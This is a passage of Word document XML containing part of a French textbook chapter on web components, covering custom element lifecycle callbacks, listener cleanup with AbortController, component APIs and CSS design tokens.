          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un composant complet en quinze lignes utiles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&lt;template id="modele-carte"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;style&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    :host { display: block; border: 1px solid #e8edf1; border-radius: 8px; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    :host([est-active]) { border-color: #e0a21b; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    .corps { padding: 1rem; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/style&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="corps"&gt;&lt;slot&gt;&lt;/slot&gt;&lt;/div&gt;</w:t>
        <w:br/>
        <w:t>&lt;/template&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;script type="module"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  class CarteProduit extends HTMLElement {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    static observedAttributes = ["titre", "est-active"];</w:t>
        <w:br/>
        <w:t xml:space="preserve">    #racine;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    #titre;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    constructor() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      super();</w:t>
        <w:br/>
        <w:t xml:space="preserve">      this.#racine = this.attachShadow({ mode: "open" });</w:t>
        <w:br/>
        <w:t xml:space="preserve">        this.#racine.append(document.getElementById("modele-carte").content.cloneNode(true));</w:t>
        <w:br/>
        <w:t xml:space="preserve">      this.#titre = document.createElement("h3");</w:t>
        <w:br/>
        <w:t xml:space="preserve">      this.#racine.querySelector(".corps").prepend(this.#titre);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    connectedCallback() { this.setAttribute("role", "group"); }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    attributeChangedCallback(nom, ancien, nouveau) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      if (nom === "titre") this.#titre.textContent = nouveau ?? "";</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  customElements.define("carte-produit", CarteProduit);</w:t>
        <w:br/>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>38.2 Le cycle de vie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un élément personnalisé traverse quatre étapes. Chacune correspond à un moment précis où l'on peut agir sans casser le rendu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.121 — Cinq points d'accroche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3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Méthode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Moment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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 typique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>constructor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Création</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2404"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attacher le shadow DOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="330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connectedCallback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Insertion dans le document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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Écouteurs, chargement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>disconnectedCallback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Retrait du document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2404"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nettoyage, annulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="330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attributeChangedCallback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Attribut observé modifié</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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Mise à jour ciblée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>adoptedCallback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Changement de document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2404"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rare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`CONNECTEDCALLBACK` PEUT S'EXÉCUTER PLUSIEURS FOIS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un élément déplacé dans le DOM est retiré puis réinséré : </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>disconnected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> puis </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>connected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> se déclenchent à nouveau. Les écouteurs doivent donc être retirés proprement, sinon ils s'accumulent.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un nettoyage fiable via `AbortController`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class Compteur extends HTMLElement {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  #valeur = 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  #abandon = null;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  connectedCallback() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    this.#abandon = new AbortController();</w:t>
        <w:br/>
        <w:t xml:space="preserve">    this.addEventListener("click", () =&gt; this.#incrementer(),</w:t>
        <w:br/>
        <w:t xml:space="preserve">      { signal: this.#abandon.signal });</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  disconnectedCallback() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    this.#abandon.abort();     // retire tous les écouteurs d'un coup</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  #incrementer() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    this.#valeur += 1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    this.dispatchEvent(new CustomEvent("compteur:changement", {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      bubbles: true, detail: { valeur: this.#valeur },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>38.3 API d'un composant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un composant utile expose une interface stable : des attributs pour la configuration déclarative, des propriétés pour l'usage programmatique, et des événements pour communiquer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un usage déclaratif lisible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&lt;carte-produit titre="Chaise haute" prix="89" devise="EUR" est-active&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p&gt;Structure en frêne massif, assise rembourrée.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;a slot="action" href="/produit/12"&gt;Voir le détail&lt;/a&gt;</w:t>
        <w:br/>
        <w:t>&lt;/carte-produit&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Attributs et propriétés synchronisés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class CarteProduit extends HTMLElement {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  static observedAttributes = ["titre", "prix", "devise", "est-active"];</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  get prix() { return Number(this.getAttribute("prix") ?? 0); }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  set prix(valeur) { this.setAttribute("prix", String(valeur)); }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  attributeChangedCallback(nom) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (["titre", "prix", "devise"].includes(nom)) this.#rendre();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  #rendre() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const montant = new Intl.NumberFormat("fr-FR", {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      style: "currency", currency: this.getAttribute("devise") ?? "EUR",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }).format(this.prix);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    this.#racine.querySelector(".prix").textContent = montant;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.122 — Cinq éléments d'interface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55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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>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Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="345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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attributs</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Auteur HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3455"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Configuration déclarative</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Propriétés</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Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="345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Mise à jour programmatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Événements</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Consommateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3455"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Notification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Slots</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Auteur HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="345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Contenu projeté</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Parties (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>part</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>)</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CSS externe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3455"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Personnalisation contrôlée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SHADOW DOM</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Arbre de nœuds attaché à un élément, isolé du document principal : les styles internes n'en sortent pas, les styles externes n'y entrent pas, sauf via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>::part</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou des propriétés personnalisées.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>38.4 Système de jetons</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un système de design ne commence pas par des composants, mais par des décisions nommées : couleurs, espacements, typographie, rayons, durées. Ces jetons traversent le shadow DOM, contrairement aux sélecteurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux niveaux de jetons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:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  /* Primitives : valeurs brutes */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-navy-700: #0f2e4c;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-ambre-500: #e0a21b;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-100: 4px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-200: 8px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-400: 16px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --rayon-m: 8px;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  /* Sémantiques : rôle dans l'interface */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-texte: var(--couleur-navy-700);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-accent: var(--couleur-ambre-500);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-bloc: var(--espace-400);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --bordure-carte: 1px solid #e8edf1;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>[data-theme="sombre"] {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-texte: #e8edf1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --bordure-carte: 1px solid #1b2c3d;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.123 — Trois niveaux de jetons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55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Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="360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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="285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Qui l'utilise</w:t>
